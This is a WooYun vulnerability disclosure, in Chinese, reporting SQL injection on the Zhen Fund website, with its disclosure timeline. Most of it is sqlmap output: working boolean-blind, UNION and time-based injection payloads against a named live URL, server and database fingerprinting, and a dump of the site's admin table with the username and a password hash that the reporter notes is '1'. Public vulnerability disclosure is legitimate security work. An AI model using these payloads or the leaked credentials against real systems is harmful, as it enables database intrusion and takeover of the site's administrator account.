乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-20: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-09-03: 厂商已经主动忽略漏洞,细节向公众公开
这是峰会圆桌上面的真格基金么 快来认领下吧
真格基金 主站注入http://www.zhenfund.com/Home/Index/category/id/4
Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) AND 1240=1240 AND (9452=9452 Type: UNION query Title: MySQL UNION query (NULL) - 14 columns Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71796f6971,0x5a6b57744f626f4c544d,0x716f6f7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) AND SLEEP(5) AND (8248=8248---[13:46:07] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: Apache 2.4.10back-end DBMS: MySQL 5.0.11[13:46:07] [INFO] fetching current usercurrent user: 'root@localhost'
Database: lfm_zgjjTable: zgjj_admin[1 entry]+---------+--------------+------+---------+----------+----------------------------------+------------+| adminId | createUserId | role | useFlag | username | password | createTime |+---------+--------------+------+---------+----------+----------------------------------+------------+| 1 | 1 | 4 | 1 | admin | c4ca4238a0b923820dcc509a6f75849b | 1427267282 |+---------+--------------+------+---------+----------+----------------------------------+------------+
密码居然是1
过滤 排查其他
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)